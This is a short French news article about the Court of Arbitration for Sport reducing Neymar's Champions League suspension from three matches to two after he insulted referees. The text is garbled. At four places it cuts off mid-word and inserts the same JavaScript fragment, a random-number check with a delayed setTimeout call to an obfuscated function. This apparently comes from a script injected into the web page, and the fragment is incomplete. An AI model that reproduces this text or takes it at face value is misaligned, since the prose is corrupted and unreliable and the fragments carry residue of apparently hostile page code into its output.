FOOTBALL: La suspension de Neymar réduite à deux matches
LIGUE DES CHAMPIONS – Le Tribunal Arbitral du Sport a décidé de réduire la suspension de Neymar en Ligue des champions de trois à deux matches. Le Brésilien pourra donc disputer la dernière rencontre des matches allers face au FC Bruges. “La sentence arbitrale avec les motifs sera publiée par le TAS dans quelques semaines”, précise le communiqué.
Finalement, Neymar fera son redom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tour en Ligue des champions un peu plus tôt que prévu. Ce mercredi, le Tribunal Arbitral du Sport a décidé de réduire la suspension de l’attaquant du Paris Saint-Germain à deux matches. Initialement, la commission de discipline de l’UEFA avait infligé trois rencontres de suspension et l’instance disciplinaire avait confirmé cette sanction. Le Brésilien sera donc à la disposition de Thomas Tuchel dès le déplacement à Bruges, le 22 ocdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tobre prochain.
L’attaquant auriverde avait vivement critiqué et insulté l’arbitrage après le huitième de finale redom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tour de Ligue des champions qui avait opposé le PSG à Manchester United. “C’est une honte. Vous mettez encore quatre personnes qui ne comprennent rien au football pour regarder cette action au ralenti“, avait-il écrit au sujet de l’action qui avait entraîné le penalty accordé aux Red Devils, à la suite d’une main de Presnel Kimpembe. “Y a rien !!! Allez vous faire foutre“, avait-il aussi ajouté. Des insultes qui lui vaudront dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tout de même de rater les rencontres face au Real Madrid et Galatasaray.

Source: Eurosport